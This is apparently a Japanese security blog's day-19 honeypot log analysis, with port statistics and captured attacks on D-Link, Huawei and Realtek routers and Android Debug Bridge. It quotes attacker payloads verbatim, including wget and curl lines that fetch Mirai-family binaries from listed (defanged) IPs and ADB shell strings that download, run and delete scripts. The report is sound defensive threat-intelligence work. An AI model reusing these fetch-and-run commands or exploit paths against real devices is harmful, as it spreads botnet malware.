ハニーポット簡易分析(19日目:8/26)
8/26からHoneytrapのログが復活したので、Honeytrapの分析を行いたいと思います。
8/26 Honeytrap分析結果
検知数 6335件(データ部 0byte以上 3622件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,781 | 49.16% | SMB | |
1433 | 70 | 1.93% | Microsoft SQL Server | |
3389 | 65 | 1.79% | RDP | |
52869 | 53 | 1.46% | D-Link, Realtek SDK | マルウェアダウンロード |
8888 | 51 | 1.41% | ? | |
81 | 49 | 1.35% | ? | |
8080 | 47 | 1.30% | PROXY | |
992 | 34 | 0.94% | TELNET protocol over TLS/SSL | |
500 | 33 | 0.91% | ipsec | |
19 | 32 | 0.88% | chargen |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
POST /HNAP1/ HTTP/1.0
・wget hxxp://148[.]72[.]176[.]78/ngynx
・wget hxxp://176[.]32[.]32[.]156/bin
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget -g 31[.]220[.]43[.]190
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picdesc.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107.191.99.41/elf.mips
・wget hxxp://167.99.228.78/ntpd.mips
・wget hxxp://128.199.45.173/sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
今回の分析は以上となります。最近、Suricataも導入したため、その結果も近日中に報告できればと思ってます(ただし、デフォルト設定で入れたため、有効な検知が少ないですが。。。)。